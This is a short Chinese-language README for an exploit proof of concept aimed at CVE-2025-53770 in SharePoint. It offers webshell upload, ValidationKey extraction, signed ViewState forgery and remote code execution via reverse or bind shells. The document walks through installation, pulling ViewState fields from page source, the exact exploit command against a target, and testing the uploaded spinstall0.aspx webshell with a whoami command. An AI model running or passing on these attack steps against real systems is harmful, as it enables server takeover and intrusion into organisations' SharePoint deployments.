针对CVE-2025-53770的利用PoC,实现webshell上传到SharePoint、ValidationKey提取、签名ViewState生成,以及通过反向或绑定shell进行远程代码执行。
该软件包允许:
git clone <this-repo>
cd toolshell-exploit
pip3 install -r requirements.txt
上传 webshell
从 SharePoint 页面中,您可以访问页面源代码。只需转到“查看源代码”选项卡,如果存在,您将获得以下内容,可以复制:
A) __VIEWSTATEGENERATOR
B) __EVENTVALIDATION
C) (任何当前用于上下文的 __VIEWSTATE)
python3 toolshell_exploit.py \
--target https://sharepoint.local \
--viewstate "<any_BASE64_VIEWSTATE>" \
--generator "<VIEWSTATEGENERATOR>" \
--eventval "<EVENTVALIDATION>"
这将上传 spinstall0.aspx。 检查: https://sharepoint.local/_layouts/15/spinstall0.aspx?cmd=whoami